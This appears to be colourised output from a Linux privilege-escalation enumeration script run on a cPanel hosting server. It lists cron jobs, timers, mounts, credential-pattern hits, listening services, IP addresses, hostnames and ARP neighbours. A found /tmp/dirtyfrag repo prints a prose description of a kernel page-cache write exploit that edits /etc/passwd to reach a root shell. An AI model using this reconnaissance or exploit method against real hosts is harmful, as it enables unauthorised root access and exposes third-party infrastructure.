  [0;37m  fi[0m
  [0;37m  MODE="$1"[0m
  [0;37m  unset MAILFROM[0m
  [0;37m  unset MAILTO[0m
  [0;37m  unset MY_HOSTID[0m
  [0;37m  unset PARTICIPATE[0m
  [0;37m  unset SUBMITURLS[0m
  [0;37m  unset USEHTTP[0m
  [0;37m  unset USETOR[0m
  [0;37m  unset MTAOPS[0m
  [0;37m  TORIFY_PATH=/usr/bin/torify[0m
  [0;37m  torify_enabled() {[0m
  [0;37m      # Return 1 to enable torify for HTTP submission, otherwise 0; exit on error[0m
  [0;37m      TORSOCKS_PATH=/usr/bin/torsocks[0m
  [0;37m      [ -f "$TORIFY_PATH" ] && [ -f "$TORSOCKS_PATH" ] && TOR_AVAILABLE=1[0m
  [0;37m      case "$USETOR" in[0m
  [0;37m          "yes")[0m
  [0;37m              if [ -z $TOR_AVAILABLE ]; then[0m
  [0;37m                  echo "popularity-contest: USETOR is set but torify is not available." 2>&1[0m
  [0;37m                  echo "popularity-contest: Please install the tor and torsocks packages." 2>&1[0m
  [0;37m                  exit 1[0m
  [0;37m              fi[0m
  [0;37m              if [ "yes" != "$USEHTTP" ]; then[0m
  [0;37m                  echo "popularity-contest: when USETOR is set USEHTTP must be set as well" 2>&1[0m
  [0;37m                  exit 1[0m
  [0;37m              fi[0m
  [0;37m              return 0[0m
  [0;37m          ;;[0m
  [0;37m          "maybe")[0m
  [0;37m              [ "yes" = "$USEHTTP" ] && [ ! -z $TOR_AVAILABLE ] && return 0[0m
  [0;37m              return 1[0m
  [0;37m          ;;[0m
  [0;37m          "no")[0m
  [0;37m              return 1[0m
  [0;37m          ;;[0m
  [0;37m      esac[0m
  [0;37m  }[0m
  [0;37m  . /usr/share/popularity-contest/default.conf[0m
  [0;37m  . /etc/popularity-contest.conf[0m
  [0;37m  if test -d /etc/popularity-contest.d/; then[0m
  [0;37m    for file in `run-parts --list --regex '\.conf$' /etc/popularity-contest.d/`;[0m
  [0;37m    do[0m
  [0;37m     . $file[0m
  [0;37m    done[0m
  [0;37m  fi[0m
  [0;37m  if [ -z "$MAILTO" ] && [ "yes" != "$USEHTTP" ]; then exit 0; fi[0m
  [0;37m  if [ "$PARTICIPATE" = "no" ] || [ -z "$PARTICIPATE" ]; then exit 0; fi[0m
  [0;37m  if torify_enabled; then[0m
  [0;37m      TORIFY=$TORIFY_PATH[0m
  [0;37m  else[0m
  [0;37m      TORIFY=''[0m
  [0;37m  fi[0m
  [0;37m  if [ -n "$HTTP_PROXY" ]; then[0m
  [0;37m    export http_proxy="$HTTP_PROXY";[0m
  [0;37m  fi[0m
  [0;37m  POPCONOLD=/var/log/popularity-contest[0m
  [0;37m  POPCONNEW=/var/log/popularity-contest.new[0m
  [0;37m  POPCON="$POPCONNEW"[0m
  [0;37m  if [ "$DAY" ] && [ "$DAY" != "$(date +%w)" ] ; then[0m
  [0;37m  	# Ensure that popcon runs at least once in the last week[0m
  [0;37m  	if [ -f "$POPCONOLD" ] ; then[0m
  [0;37m  		now=$(date +%s)[0m
  [0;37m  		lastrun=$(date -r $POPCONOLD +%s)[0m
  [0;37m                  if [ "$MODE" = "--crond" ]; then[0m
  [0;37m  			# 6.5 days, in seconds[0m
  [0;37m  			week=561600[0m
  [0;37m  	        else[0m
  [0;37m  			# 7.5 days, in seconds[0m
  [0;37m  			week=648000[0m
  [0;37m                  fi[0m
  [0;37m  		if [ "$(( $now - $lastrun ))" -le "$week" ]; then[0m
  [0;37m  			exit 0[0m
  [0;37m  		fi[0m
  [0;37m  	fi[0m
  [0;37m  fi[0m
  [0;37m  cd /var/log[0m
  [0;37m  umask 022[0m
  [0;37m  savelog -c 7 popularity-contest >/dev/null[0m
  [0;37m  run_popcon()[0m
  [0;37m  {[0m
  [0;37m  	runuser -s /bin/sh -c "/usr/sbin/popularity-contest" nobody[0m
  [0;37m  }[0m
  [0;37m  do_sendmail()[0m
  [0;37m  {[0m
  [0;37m  	if [ -n "$MAILFROM" ]; then[0m
  [0;37m  		sendmail -oi $MTAOPS -f "$MAILFROM" $MAILTO[0m
  [0;37m  	else[0m
  [0;37m  		sendmail -oi $MTAOPS $MAILTO[0m
  [0;37m  	fi[0m
  [0;37m  }[0m
  [0;37m  run_popcon > $POPCON[0m
  [0;37m  GPG=/usr/bin/gpg[0m
  [0;37m  if [ "$ENCRYPT" = "yes" ] && ! [ -x "$GPG" ]; then[0m
  [0;37m    logger -t popularity-contest "encryption required but gpg is not available."[0m
  [0;37m    echo "popularity-contest: encryption required but gpg is not available." 2>&1[0m
  [0;37m    exit 1[0m
  [0;37m  fi[0m
  [0;37m  if [ -x "$GPG" ] && [ "$ENCRYPT" = "maybe" ] || [ "$ENCRYPT" = "yes" ]; then[0m
  [0;37m    POPCONGPG="$POPCON.gpg"[0m
  [0;37m    rm -f "$POPCONGPG"[0m
  [0;37m    GPGHOME=`mktemp -d`[0m
  [0;37m    $GPG --batch --no-options --no-default-keyring --trust-model=always \033[0m
  [0;37m         --homedir "$GPGHOME" --keyring $KEYRING --quiet \033[0m
  [0;37m         --armor -o "$POPCONGPG" -r $POPCONKEY --encrypt "$POPCON"[0m
  [0;37m    rm -rf "$GPGHOME"[0m
  [0;37m    POPCON="$POPCONGPG"[0m
  [0;37m  fi[0m
  [0;37m  SUBMITTED=no[0m
  [0;37m  if [ "$SUBMITURLS" ] && [ "yes" = "$USEHTTP" ]; then[0m
  [0;37m      for URL in $SUBMITURLS ; do[0m
  [0;37m  	if setsid $TORIFY /usr/share/popularity-contest/popcon-upload \033[0m
  [0;37m  	    -u $URL -f $POPCON -C 2>/dev/null ; then[0m
  [0;37m  		SUBMITTED=yes[0m
  [0;37m  	else[0m
  [0;37m  		logger -t popularity-contest "unable to submit report to $URL."[0m
  [0;37m  	fi[0m
  [0;37m      done[0m
  [0;37m  fi[0m
  [0;37m  if [ "$MODE" = "--crond" ] && [ yes != "$SUBMITTED" ] && [ yes != "$USETOR" ] && [ "$MAILTO" ]; then[0m
  [0;37m      if [ -x "`which sendmail 2>/dev/null`" ]; then[0m
  [0;37m  	([0m
  [0;37m  	    if [ -n "$MAILFROM" ]; then[0m
  [0;37m  	       	echo "From: <$MAILFROM>"[0m
  [0;37m  	    	echo "Sender: <$MAILFROM>"[0m
  [0;37m  	    fi[0m
  [0;37m  	    echo "To: $MAILTO"[0m
  [0;37m  	    echo "Subject: popularity-contest submission"[0m
  [0;37m  	    echo "MIME-Version: 1.0"[0m
  [0;37m  	    echo "Content-Type: text/plain"[0m
  [0;37m  	    echo[0m
  [0;37m  	    cat $POPCON[0m
  [0;37m  	) | do_sendmail[0m
  [0;37m  	SUBMITTED=yes[0m
  [0;37m      else[0m
  [0;37m  	logger -t popularity-contest "unable to submit report using sendmail."[0m
  [0;37m      fi[0m
  [0;37m  fi[0m
  [0;37m  if [ "yes" != "$SUBMITTED" ] ; then[0m
  [0;37m  	logger -t popularity-contest "unable to submit report."[0m
  [0;37m  else[0m
  [0;37m  	mv $POPCONNEW $POPCONOLD[0m
  [0;37m  fi[0m
  [1;36m[/etc/cron.daily/quota][0m
  [0;37m  test -x /usr/sbin/warnquota || exit 0[0m
  [0;37m  test -f /etc/default/quota || exit 0[0m
  [0;37m  . /etc/default/quota[0m
  [0;37m  if [ "$run_warnquota" = "true" ]; then[0m
  [0;37m  	# check if quotas are enabled[0m
  [0;37m  	if grep -q '^[^#]*quota' /etc/fstab; then[0m
  [0;37m          	/usr/sbin/warnquota -ug[0m
  [0;37m  	fi	[0m
  [0;37m  fi[0m
  [0;37m  exit 0[0m
  [1;36m[/etc/cron.daily/sysstat][0m
  [0;37m  DEFAULT=/etc/default/sysstat[0m
  [0;37m  ENABLED=false[0m
  [0;37m  [ ! -x /usr/lib/sysstat/sa2 ] && exit 0[0m
  [0;37m  [ -r "$DEFAULT" ] && . "$DEFAULT" [0m
  [0;37m  [ "$ENABLED" = "true" ]  || exit 0[0m
  [0;37m  exec /usr/lib/sysstat/sa2 -A[0m
  [1;36m[/etc/cron.daily/update-notifier-common][0m
  [0;37m  set -e[0m
  [0;37m  [ -x /usr/lib/update-notifier/package-data-downloader ] || exit 0[0m
  [0;37m  /usr/lib/update-notifier/package-data-downloader[0m
  [1;36m[/etc/cron.weekly/man-db][0m
  [0;37m  set -e[0m
  [0;37m  if [ -d /run/systemd/system ]; then[0m
  [0;37m      # Skip in favour of systemd timer.[0m
  [0;37m      exit 0[0m
  [0;37m  fi[0m
  [0;37m  iosched_idle=[0m
  [0;37m  if ! egrep -q '(envID|VxID):.*[1-9]' /proc/self/status && \033[0m
  [0;37m     ([ ! -d /proc/vz ] || [ -d /proc/bc ]); then[0m
  [0;37m      iosched_idle='--iosched idle'[0m
  [0;37m  fi[0m
  [0;37m  if ! [ -d /var/cache/man ]; then[0m
  [0;37m      # Recover from deletion, per FHS.[0m
  [0;37m      install -d -o man -g man -m 0755 /var/cache/man[0m
  [0;37m  fi[0m
  [0;37m  if [ -x /usr/bin/mandb ]; then[0m
  [0;37m      # --pidfile /dev/null so it always starts; mandb isn't really a daemon,[0m
  [0;37m      # but we want to start it like one.[0m
  [0;37m      start-stop-daemon --start --pidfile /dev/null \033[0m
  [0;37m  		      --startas /usr/bin/mandb --oknodo --chuid man \033[0m
  [0;37m  		      $iosched_idle \033[0m
  [0;37m  		      -- --quiet[0m
  [0;37m  fi[0m
  [0;37m  exit 0[0m
  [1;36m[/etc/cron.weekly/update-notifier-common][0m
  [0;37m  set -e[0m
  [0;37m  [ -x /usr/lib/ubuntu-release-upgrader/release-upgrade-motd ] || exit 0[0m
  [0;37m  sleep_then_check() {[0m
  [0;37m      # Sleep for up to an hour to spread the load of checking for updates on[0m
  [0;37m      # the Ubuntu infrastructure[0m
  [0;37m      sleep $(shuf -i 1-3600 -n 1)[0m
  [0;37m      # Check to see whether there is a new version of Ubuntu available[0m
  [0;37m      /usr/lib/ubuntu-release-upgrader/release-upgrade-motd[0m
  [0;37m  }[0m
  [0;37m  sleep_then_check &[0m

 [1;37m[INFO]    [0m ═══ Systemd Timers ═══
NEXT                         LEFT          LAST                         PASSED        UNIT                              ACTIVATES                          
Mon 2026-05-18 22:36:23 AWST 1h 44min left Mon 2026-05-18 05:36:10 AWST 15h ago       motd-news.timer                   motd-news.service                  
Tue 2026-05-19 00:00:00 AWST 3h 7min left  Mon 2026-05-18 00:00:00 AWST 20h ago       initialize_socialbee_plugin.timer initialize_socialbee_plugin.service
Tue 2026-05-19 00:00:00 AWST 3h 7min left  Mon 2026-05-18 00:00:00 AWST 20h ago       initialize_xovi_plugin.timer      initialize_xovi_plugin.service     
Tue 2026-05-19 00:00:00 AWST 3h 7min left  Mon 2026-05-18 00:00:00 AWST 20h ago       logrotate.timer                   logrotate.service                  
Tue 2026-05-19 00:00:00 AWST 3h 7min left  Mon 2026-05-18 00:00:00 AWST 20h ago       man-db.timer                      man-db.service                     
Tue 2026-05-19 00:48:10 AWST 3h 55min left Mon 2026-05-18 10:30:00 AWST 10h ago       apt-daily.timer                   apt-daily.service                  
Tue 2026-05-19 00:53:53 AWST 4h 1min left  Mon 2026-05-18 15:46:03 AWST 5h 6min ago   fwupd-refresh.timer               fwupd-refresh.service              
Tue 2026-05-19 06:29:56 AWST 9h left       Mon 2026-05-18 06:49:57 AWST 14h ago       apt-daily-upgrade.timer           apt-daily-upgrade.service          
Tue 2026-05-19 14:42:01 AWST 17h left      Mon 2026-05-18 14:42:01 AWST 6h ago        systemd-tmpfiles-clean.timer      systemd-tmpfiles-clean.service     
Sun 2026-05-24 03:10:06 AWST 5 days left   Sun 2026-05-17 03:10:21 AWST 1 day 17h ago e2scrub_all.timer                 e2scrub_all.service                
Mon 2026-05-25 00:00:00 AWST 6 days left   Mon 2026-05-18 00:00:00 AWST 20h ago       fstrim.timer                      fstrim.service                     
n/a                          n/a           n/a                          n/a           snapd.snap-repair.timer           snapd.snap-repair.service          
n/a                          n/a           n/a                          n/a           ua-timer.timer                    ua-timer.service                   

[0;37m  └─ completed in 2s[0m

[1;36m━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━[0m
[1;32m[1m  🐳 CONTAINER CHECKS[0m
[1;36m━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━[0m
 [1;37m[INFO]    [0m Groups: rehab
[0;37m  └─ completed in 0s[0m

[1;36m━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━[0m
[1;32m[1m  📁 FILESYSTEM ANALYSIS[0m
[1;36m━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━[0m
 [1;37m[INFO]    [0m ═══ Mount Options ═══
 [1;33m[MEDIUM]  [0m [1;33mMount without nosuid → /[0m
 [1;33m[MEDIUM]  [0m [1;33mMount without nosuid → /snap/core18/2979[0m
 [1;33m[MEDIUM]  [0m [1;33mMount without nosuid → /home2[0m
 [1;33m[MEDIUM]  [0m [1;33mMount without nosuid → /snap/core18/2999[0m
 [1;33m[MEDIUM]  [0m [1;33mMount without nosuid → /snap/core20/2769[0m
 [1;33m[MEDIUM]  [0m [1;33mMount without nosuid → /snap/snapd/26382[0m
 [1;33m[MEDIUM]  [0m [1;33mMount without nosuid → /boot[0m
 [1;33m[MEDIUM]  [0m [1;33mMount without nosuid → /snap/lxd/38688[0m
 [1;33m[MEDIUM]  [0m [1;33mMount without nosuid → /snap/lxd/38333[0m
 [1;33m[MEDIUM]  [0m [1;33mMount without nosuid → /backup[0m
 [1;33m[MEDIUM]  [0m [1;33mMount without nosuid → /snap/snapd/26865[0m
 [1;33m[MEDIUM]  [0m [1;33mMount without nosuid → /home/virtfs/aviation/opt[0m
 [1;33m[MEDIUM]  [0m [1;33mMount without nosuid → /home/virtfs/aviation/usr[0m
 [1;33m[MEDIUM]  [0m [1;33mMount without nosuid → /home/virtfs/aviation/var[0m
 [1;33m[MEDIUM]  [0m [1;33mMount without nosuid → /home/virtfs/aviation/etc/scl[0m
 [1;33m[MEDIUM]  [0m [1;33mMount without nosuid → /home/virtfs/aviation/etc/mail[0m
 [1;33m[MEDIUM]  [0m [1;33mMount without nosuid → /home/virtfs/aviation/etc/apache2[0m
 [1;33m[MEDIUM]  [0m [1;33mMount without nosuid → /home/virtfs/aviation/etc/alternatives[0m
 [1;33m[MEDIUM]  [0m [1;33mMount without nosuid → /home/virtfs/aviation/home2/aviation[0m
 [1;33m[MEDIUM]  [0m [1;33mMount without nosuid → /snap/core20/2866[0m
 [1;33m[MEDIUM]  [0m [1;33mMount without nosuid → /home/virtfs/oranacinemascom/opt[0m
 [1;33m[MEDIUM]  [0m [1;33mMount without nosuid → /home/virtfs/oranacinemascom/usr[0m
 [1;33m[MEDIUM]  [0m [1;33mMount without nosuid → /home/virtfs/oranacinemascom/var[0m
 [1;33m[MEDIUM]  [0m [1;33mMount without nosuid → /home/virtfs/oranacinemascom/etc/scl[0m
 [1;33m[MEDIUM]  [0m [1;33mMount without nosuid → /home/virtfs/oranacinemascom/etc/mail[0m
 [1;33m[MEDIUM]  [0m [1;33mMount without nosuid → /home/virtfs/oranacinemascom/etc/apache2[0m
 [1;33m[MEDIUM]  [0m [1;33mMount without nosuid → /home/virtfs/oranacinemascom/etc/alternatives[0m
 [1;33m[MEDIUM]  [0m [1;33mMount without nosuid → /home/virtfs/oranacinemascom/home2/oranacinemascom[0m

 [1;37m[INFO]    [0m ═══ NFS ═══

 [1;37m[INFO]    [0m ═══ Writable Directories (non-standard) ═══
 [1;33m[MEDIUM]  [0m [1;33mWritable dir → /var/crash[0m

 [1;37m[INFO]    [0m ═══ Writable Files (non-standard) ═══
[0;37m  └─ completed in 8s[0m

[1;36m━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━[0m
[1;32m[1m  🔎 DEEP SCAN (parallel)[0m
[1;36m━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━[0m
 [1;37m[INFO]    [0m Running 7 scans in parallel for speed...

 [1;37m[INFO]    [0m ═══ Credentials ═══
 [41m[1;37m CRITICAL [0m [1;31mPotential credentials found![0m
  [1;33m  /opt/cpanel/ea-php74/root/usr/share/pear/PEAR/PackageFile/v2/Validator.php:1918:                $token = $tokens[$i];[0m
  [1;33m  /opt/cpanel/ea-php74/root/usr/share/pear/PEAR/PackageFile/v2/Validator.php:2028:                    $token = $tokens[$i - 1][0];[0m
  [1;33m  /opt/cpanel/ea-php74/root/usr/share/pear/PEAR/PackageFile/v2/Validator.php:2029:                    if (!($token == T_WHITESPACE || $token == T_STRING || $token == T_STATIC || $token == T_VARIABLE)) {[0m
  [1;33m  /opt/cpanel/ea-php74/root/usr/share/pear/PEAR/PackageFile/v1.php:1411:                $token = $tokens[$i];[0m
  [1;33m  /opt/cpanel/ea-php74/root/usr/share/pear/PEAR/Command/Channels.php:735:            $password = $matches[2];[0m
  [1;33m  /opt/cpanel/ea-php74/root/usr/share/pear/PEAR/Command/Channels.php:824:        $password = trim($password);[0m
  [1;33m  /opt/cpanel/ea-php74/root/usr/share/pear/PEAR/REST.php:389:        $password = $this->config->get('password', null, $channel);[0m
  [1;33m  /opt/cpanel/ea-php74/root/usr/share/pear/PEAR/Downloader.php:1643:            $password = $config->get('password', null, $channel);[0m
  [1;33m  /opt/cpanel/ea-php74/root/etc/php.ini:1061:;ibase.default_password =[0m
  [1;33m  /opt/cpanel/ea-php81/root/usr/share/pear/PEAR/PackageFile/v2/Validator.php:1918:                $token = $tokens[$i];[0m
  [1;33m  /opt/cpanel/ea-php81/root/usr/share/pear/PEAR/PackageFile/v2/Validator.php:2028:                    $token = $tokens[$i - 1][0];[0m
  [1;33m  /opt/cpanel/ea-php81/root/usr/share/pear/PEAR/PackageFile/v2/Validator.php:2029:                    if (!($token == T_WHITESPACE || $token == T_STRING || $token == T_STATIC || $token == T_VARIABLE)) {[0m
  [1;33m  /opt/cpanel/ea-php81/root/usr/share/pear/PEAR/PackageFile/v1.php:1411:                $token = $tokens[$i];[0m
  [1;33m  /opt/cpanel/ea-php81/root/usr/share/pear/PEAR/Command/Channels.php:735:            $password = $matches[2];[0m
  [1;33m  /opt/cpanel/ea-php81/root/usr/share/pear/PEAR/Command/Channels.php:824:        $password = trim($password);[0m
  [1;33m  /opt/cpanel/ea-php81/root/usr/share/pear/PEAR/REST.php:389:        $password = $this->config->get('password', null, $channel);[0m
  [1;33m  /opt/cpanel/ea-php81/root/usr/share/pear/PEAR/Downloader.php:1643:            $password = $config->get('password', null, $channel);[0m
  [1;33m  /opt/cpanel/ea-php81/root/etc/php.ini.dpkg-dist:1056:;ibase.default_password =[0m
  [1;33m  /opt/cpanel/ea-php81/root/etc/php.ini:1061:;ibase.default_password =[0m
  [1;33m  /opt/cpanel/ea-php82/root/usr/share/pear/PEAR/PackageFile/v2/Validator.php:1918:                $token = $tokens[$i];[0m
 [1;33m[MEDIUM]  [0m [1;33mConfig with possible creds → /etc/overlayroot.conf[0m
 [1;33m[MEDIUM]  [0m [1;33mConfig with possible creds → /etc/exim.conf[0m
 [1;33m[MEDIUM]  [0m [1;33mConfig with possible creds → /etc/hdparm.conf[0m
 [1;33m[MEDIUM]  [0m [1;33mConfig with possible creds → /etc/debconf.conf[0m
 [1;33m[MEDIUM]  [0m [1;33mConfig with possible creds → /etc/sos/sos.conf[0m
 [1;33m[MEDIUM]  [0m [1;33mConfig with possible creds → /etc/adduser.conf[0m
 [1;33m[MEDIUM]  [0m [1;33mConfig with possible creds → /etc/security/faillock.conf[0m
 [1;33m[MEDIUM]  [0m [1;33mConfig with possible creds → /etc/security/group.conf[0m
 [1;33m[MEDIUM]  [0m [1;33mConfig with possible creds → /etc/security/time.conf[0m
 [1;33m[MEDIUM]  [0m [1;33mConfig with possible creds → /etc/cracklib/cracklib.conf[0m

 [1;37m[INFO]    [0m ═══ SSH Keys ═══

 [1;37m[INFO]    [0m ═══ Web Config Files ═══

 [1;37m[INFO]    [0m ═══ Backups & Databases ═══

 [1;37m[INFO]    [0m ═══ Library Path Hijacking ═══

 [1;37m[INFO]    [0m ═══ Internal Services ═══

 [1;37m[INFO]    [0m ═══ Git Repositories ═══
 [1;33m[MEDIUM]  [0m [1;33mGit repo → /tmp/dirtyfrag[0m
  [0;37m  aab16fc update[0m
  [0;37m  cb2bc34 update[0m
  [0;37m  5bb21af update[0m
  [0;37m  8beafb1 template[0m
  [0;37m  8827072 typo[0m
 [38;5;208m[HIGH]    [0m [38;5;208mSecret in git history →  For each of the three positions (off = 4, 6, 8), the exploit runs the following sequence in turn: update K, `add_key`, socket setup, handshake, cksum computation, splice + recvmsg. With last-write-wins, chars 4..15 of `/etc/passwd` line 1 are replaced with the shape `"::0:0:GGGGGG:"`. Finally, when the parent process execs `/usr/bin/su -` along with a PTY, `pam_unix.so nullok` of PAM common-auth accepts the empty passwd field and lets it through without a prompt. su then performs `setresuid(0, 0, 0)` and execs `/bin/bash`, dropping into a root shell. This variant does not use `unshare()`, and `add_key()`, `socket(AF_RXRPC)`, `socket(AF_ALG)` (for cksum computation), `splice()`, and `recvmsg()` are all APIs available to unprivileged users.[0m
 [38;5;208m[HIGH]    [0m [38;5;208mSecret in git history → +What both vulnerabilities have in common is that, on a zero-copy send path where `splice()` plants a reference to a page cache page that the attacker only has read access to into the `frag` slot of the sender side skb as is, the receiver side kernel code performs in-place crypto on top of that frag. As a result, the page cache of files that an unprivileged user only has read access to (such as `/etc/passwd` or `/usr/bin/su`) is modified in RAM, and every subsequent read sees the modified copy.[0m
 [38;5;208m[HIGH]    [0m [38;5;208mSecret in git history → +Therefore, the attacker can control both the location (file offset) and the value (4 bytes) of the STORE. AEAD authentication verification runs after the STORE, so even when authentication fails the STORE has already happened and the page cache modification persists permanently. In other words, the attacker succeeds in modification without knowing the SA's authentication key.[0m
 [38;5;208m[HIGH]    [0m [38;5;208mSecret in git history → +Next, 48 chunks worth of XFRM SAs are registered at once. Each SA has a separate SPI (`0xDEADBE10 + i`), and the 4 bytes (`= shellcode[i*4..(i+1)*4]`) placed in `XFRMA_REPLAY_ESN_VAL.seq_hi` are exactly the value that will be STOREd into the page cache. The body of the SA is filled with `XFRM_MODE_TRANSPORT + XFRM_STATE_ESN`, the algorithm `authencesn(hmac(sha256), cbc(aes))`, UDP-encap (sport=dport=4500), the replay state `{bmp_len=1, seq=100, replay_window=32}`, and src/daddr `127.0.0.1`. The HMAC key (32 bytes) and the cipher key (16 bytes) are arbitrary values, since the authentication and decryption verification will fail anyway.[0m
 [38;5;208m[HIGH]    [0m [38;5;208mSecret in git history → +The difference from xfrm-ESP Page-Cache Write is that the value of the STORE is not the 4 bytes that the attacker controls directly, but 8 bytes that have gone through the cipher function once with the attacker's key K. Since the IV is 0 and the block is single, `pcbc_decrypt(C, K, IV=0)` is equivalent to a single `fcrypt_decrypt(C, K)`. In other words, the 8 bytes that get STOREd are the result of `fcrypt_decrypt(C, K)`, and the attacker can keep changing K and brute force in user-space until the desired 8-byte plaintext drops out.[0m
[0;37m  └─ completed in 3s[0m

[1;36m━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━[0m
[1;32m[1m  🌐 NETWORK[0m
[1;36m━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━[0m
 [1;37m[INFO]    [0m ═══ Listening Ports ═══
  [0;37mNetid  State   Recv-Q  Send-Q   Local Address:Port    Peer Address:Port Process [0m
  [0;37mudp    UNCONN  0       0              0.0.0.0:53           0.0.0.0:*            [0m
  [0;37mudp    UNCONN  0       0              0.0.0.0:111          0.0.0.0:*            [0m
  [0;37mudp    UNCONN  0       0                 [::]:53              [::]:*            [0m
  [0;37mudp    UNCONN  0       0                 [::]:111             [::]:*            [0m
  [0;37mtcp    LISTEN  0       50             0.0.0.0:25           0.0.0.0:*            [0m
  [0;37mtcp    LISTEN  0       10           127.0.0.1:953          0.0.0.0:*            [0m
  [0;37mtcp    LISTEN  0       511            0.0.0.0:443          0.0.0.0:*            [0m
  [0;37mtcp    LISTEN  0       45             0.0.0.0:2077         0.0.0.0:*            [0m
  [0;37mtcp    LISTEN  0       45             0.0.0.0:2078         0.0.0.0:*            [0m
  [0;37mtcp    LISTEN  0       4096           0.0.0.0:993          0.0.0.0:*            [0m
  [0;37mtcp    LISTEN  0       45             0.0.0.0:2082         0.0.0.0:*            [0m
  [0;37mtcp    LISTEN  0       4096           0.0.0.0:995          0.0.0.0:*            [0m
  [0;37mtcp    LISTEN  0       45           127.0.0.1:579          0.0.0.0:*            [0m
  [0;37mtcp    LISTEN  0       45             0.0.0.0:2083         0.0.0.0:*            [0m
  [0;37mtcp    LISTEN  0       45             0.0.0.0:2086         0.0.0.0:*            [0m
  [0;37mtcp    LISTEN  0       45             0.0.0.0:2087         0.0.0.0:*            [0m
  [0;37mtcp    LISTEN  0       50             0.0.0.0:587          0.0.0.0:*            [0m
  [0;37mtcp    LISTEN  0       45             0.0.0.0:2091         0.0.0.0:*            [0m
  [0;37mtcp    LISTEN  0       1024         127.0.0.1:11211        0.0.0.0:*            [0m
 [38;5;208m[HIGH]    [0m [38;5;208mInteresting service on :11211[0m
  [0;37mtcp    LISTEN  0       4096           0.0.0.0:110          0.0.0.0:*            [0m
  [0;37mtcp    LISTEN  0       4096         127.0.0.1:783          0.0.0.0:*            [0m
  [0;37mtcp    LISTEN  0       4096           0.0.0.0:143          0.0.0.0:*            [0m
  [0;37mtcp    LISTEN  0       45             0.0.0.0:2095         0.0.0.0:*            [0m
  [0;37mtcp    LISTEN  0       4096           0.0.0.0:111          0.0.0.0:*            [0m
  [0;37mtcp    LISTEN  0       511            0.0.0.0:80           0.0.0.0:*            [0m
  [0;37mtcp    LISTEN  0       50           127.0.0.1:7984         0.0.0.0:*            [0m
  [0;37mtcp    LISTEN  0       45             0.0.0.0:2096         0.0.0.0:*            [0m
  [0;37mtcp    LISTEN  0       50             0.0.0.0:465          0.0.0.0:*            [0m
  [0;37mtcp    LISTEN  0       9              0.0.0.0:21           0.0.0.0:*            [0m
  [0;37mtcp    LISTEN  0       128            0.0.0.0:53           0.0.0.0:*            [0m
  [0;37mtcp    LISTEN  0       128            0.0.0.0:22           0.0.0.0:*            [0m
  [0;37mtcp    LISTEN  0       50           127.0.0.1:8984         0.0.0.0:*            [0m
  [0;37mtcp    LISTEN  0       244          127.0.1.1:5432         0.0.0.0:*            [0m
 [38;5;208m[HIGH]    [0m [38;5;208mInteresting service on :5432[0m
  [0;37mtcp    LISTEN  0       244          127.0.0.1:5432         0.0.0.0:*            [0m
 [38;5;208m[HIGH]    [0m [38;5;208mInteresting service on :5432[0m
  [0;37mtcp    LISTEN  0       50                [::]:25              [::]:*            [0m
  [0;37mtcp    LISTEN  0       2024                 *:2079               *:*            [0m
  [0;37mtcp    LISTEN  0       2024                 *:2080               *:*            [0m
  [0;37mtcp    LISTEN  0       500                  *:3306               *:*            [0m
 [38;5;208m[HIGH]    [0m [38;5;208mInteresting service on :3306[0m
  [0;37mtcp    LISTEN  0       50                [::]:587             [::]:*            [0m
  [0;37mtcp    LISTEN  0       4096              [::]:111             [::]:*            [0m
  [0;37mtcp    LISTEN  0       50                [::]:465             [::]:*            [0m
  [0;37mtcp    LISTEN  0       9                 [::]:21              [::]:*            [0m
  [0;37mtcp    LISTEN  0       128               [::]:53              [::]:*            [0m
  [0;37mtcp    LISTEN  0       128               [::]:22              [::]:*            [0m
  [0;37mtcp    LISTEN  0       244              [::1]:5432            [::]:*            [0m
 [38;5;208m[HIGH]    [0m [38;5;208mInteresting service on :1[0m

 [1;37m[INFO]    [0m ═══ Interfaces ═══
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
2: ens160: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
    link/ether 00:50:56:9a:7a:37 brd ff:ff:ff:ff:ff:ff
    inet 103.172.142.20/26 brd 103.172.142.63 scope global ens160
       valid_lft forever preferred_lft forever
    inet 103.172.142.21/26 brd 103.172.142.63 scope global secondary ens160:cp1
       valid_lft forever preferred_lft forever
3: ens192: <BROADCAST,MULTICAST> mtu 1500 qdisc noop state DOWN group default qlen 1000
    link/ether 00:50:56:9a:c6:03 brd ff:ff:ff:ff:ff:ff

 [1;37m[INFO]    [0m ═══ Routes ═══
default via 103.172.142.3 dev ens160 proto static 
103.172.142.0/26 dev ens160 proto kernel scope link src 103.172.142.20 
103.172.142.21 dev ens160 scope link src 103.172.142.21 

 [1;37m[INFO]    [0m ═══ /etc/hosts ═══
127.0.0.1		localhost
127.0.1.1		localhost chs01
::1		localhost ip6-localhost ip6-loopback
fe00::0		ip6-localnet
ff00::0		ip6-mcastprefix
ff02::1		ip6-allnodes
ff02::2		ip6-allrouters
103.172.142.20		chs01.logicit.net chs01 103-172-142-20.cprapid.com 103-172-142-20

 [1;37m[INFO]    [0m ═══ ARP ═══
mx1.logicit.net (103.172.142.31) at c4:64:13:39:cb:af [ether] on ens160
uisp.logicit.net (103.172.142.13) at d4:ca:6d:74:8e:27 [ether] on ens160
? (103.172.142.32) at 50:3d:e5:9c:8b:5a [ether] on ens160
? (103.172.142.3) at 00:50:56:9a:46:8c [ether] on ens160
? (103.172.142.2) at 00:50:56:9a:d8:d5 [ether] on ens160
? (103.172.142.37) at 00:50:56:9b:08:54 [ether] on ens160
